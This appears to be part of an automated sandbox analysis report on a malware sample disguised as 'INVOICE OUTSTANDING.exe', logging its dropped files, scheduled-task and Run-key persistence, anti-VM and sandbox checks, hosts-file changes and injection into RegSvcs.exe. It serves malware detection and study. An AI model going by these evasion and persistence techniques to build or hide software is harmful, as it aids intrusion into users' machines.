            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06C61863 push es; ret 14_2_06C618C4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06C6187F push es; ret 14_2_06C618C4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06C61817 push es; ret 14_2_06C618C4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06C6181B push es; ret 14_2_06C618C4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06C61833 push es; ret 14_2_06C618C4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06C62177 push edi; retn 0000h14_2_06C62179
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06D114F3 push es; retf 14_2_06D114F8
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06D114FB push es; retf 14_2_06D114FC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06D114FF push es; retf 14_2_06D11500
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06D114EF push es; retf 14_2_06D114F0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06D114B3 push es; retf 14_2_06D114B4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06D114B7 push es; retf 14_2_06D114EC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06D114BF push es; retf 14_2_06D114EC
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06D114A3 push es; retf 14_2_06D114A4
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06D11457 push es; retf 14_2_06D11458
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06D11473 push es; retf 14_2_06D114A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06D11467 push es; retf 14_2_06D11468
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06D1146B push es; retf 14_2_06D114A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06D1141B push es; retf 14_2_06D1141C
            Source: initial sampleStatic PE information: section name: .text entropy: 7.770423052382821
            Source: initial sampleStatic PE information: section name: .text entropy: 7.770423052382821
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeFile created: C:\Users\user\AppData\Roaming\ahgeNfsrA.exeJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeJump to dropped file

            Boot Survival

            barindex
            Uses schtasks.exe or at.exe to add and modify task schedules
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\ahgeNfsrA" /XML "C:\Users\user\AppData\Local\Temp\tmp69D2.tmp
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run kECjSJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRegistry value created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run kECjSJump to behavior

            Hooking and other Techniques for Hiding and Protection

            barindex
            Hides that the sample has been downloaded from the Internet (zone.identifier)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\kECjS\kECjS.exe:Zone.Identifier read attributes | deleteJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Yara detected AntiVM3
            Source: Yara matchFile source: Process Memory Space: INVOICE OUTSTANDING.exe PID: 5128, type: MEMORYSTR
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.339297827.0000000003349000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000002.334122042.0000000002E68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.339297827.0000000003349000.00000004.00000800.00020000.00000000.sdmp, INVOICE OUTSTANDING.exe, 00000000.00000002.334122042.0000000002E68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
            Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe TID: 5484Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exe TID: 3636Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exe TID: 4216Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 9568Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\kECjS\kECjS.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.334122042.0000000002E68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.334122042.0000000002E68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmware
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.334122042.0000000002E68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.334122042.0000000002E68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.334122042.0000000002E68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.334122042.0000000002E68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.334122042.0000000002E68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.334122042.0000000002E68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware SVGA II
            Source: INVOICE OUTSTANDING.exe, 00000000.00000002.334122042.0000000002E68000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
            Source: RegSvcs.exe, 0000000E.00000002.551236469.00000000067C2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_06C6B6A0 LdrInitializeThunk,14_2_06C6B6A0
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Writes to foreign memory regions
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000Jump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000Jump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 436000Jump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 438000Jump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 107C008Jump to behavior
            Modifies the hosts file
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
            Injects a PE file into a foreign processes
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5AJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess created: C:\Windows\System32\BackgroundTransferHost.exe "BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.1Jump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe {path}Jump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Users\user\Desktop\INVOICE OUTSTANDING.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\INVOICE OUTSTANDING.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
